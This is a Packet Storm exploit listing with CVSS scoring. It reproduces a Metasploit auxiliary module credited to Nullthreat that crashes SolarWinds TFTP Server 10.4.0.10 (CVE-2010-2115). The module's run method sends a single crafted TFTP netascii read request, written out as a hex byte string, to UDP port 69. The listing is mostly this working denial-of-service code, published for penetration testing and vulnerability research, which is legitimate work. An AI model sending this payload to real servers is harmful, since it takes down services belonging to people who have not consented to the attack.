Lucene search

K
packetstormNullthreat, metasploit.comPACKETSTORM:180555
HistoryAug 31, 2024 - 12:00 a.m.

SolarWinds TFTP Server 10.4.0.10 Denial of Service

2024-08-3100:00:00
nullthreat, metasploit.com
packetstormsecurity.com
7
solarwinds tftp server
denial of service
netascii
read request
cve-2010-2115
osvdb-64845
edb-12683

CVSS2

5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

NONE

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:N/I:N/A:P

AI Score

7

Confidence

Low

`##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
class MetasploitModule < Msf::Auxiliary  
include Msf::Exploit::Remote::Udp  
include Msf::Auxiliary::Dos  
  
def initialize(info = {})  
super(update_info(info,  
'Name' => 'SolarWinds TFTP Server 10.4.0.10 Denial of Service' ,  
'Description' => %q{  
The SolarWinds TFTP server can be shut down by sending a 'netascii' read  
request with a specially crafted file name.  
},  
'Author' => 'Nullthreat',  
'License' => MSF_LICENSE,  
'References' =>  
[  
[ 'CVE', '2010-2115' ],  
[ 'OSVDB', '64845' ],  
[ 'EDB', '12683' ]  
],  
'DisclosureDate' => '2010-05-21'))  
  
register_options([  
Opt::RPORT(69)  
])  
end  
  
def run  
connect_udp  
print_status("Sending Crash request...")  
udp_sock.put("\x00\x01\x01\x00\x6e\x65\x74\x61\x73\x63\x69\x69\x00")  
disconnect_udp  
end  
end  
`

CVSS2

5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

NONE

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:N/I:N/A:P

AI Score

7

Confidence

Low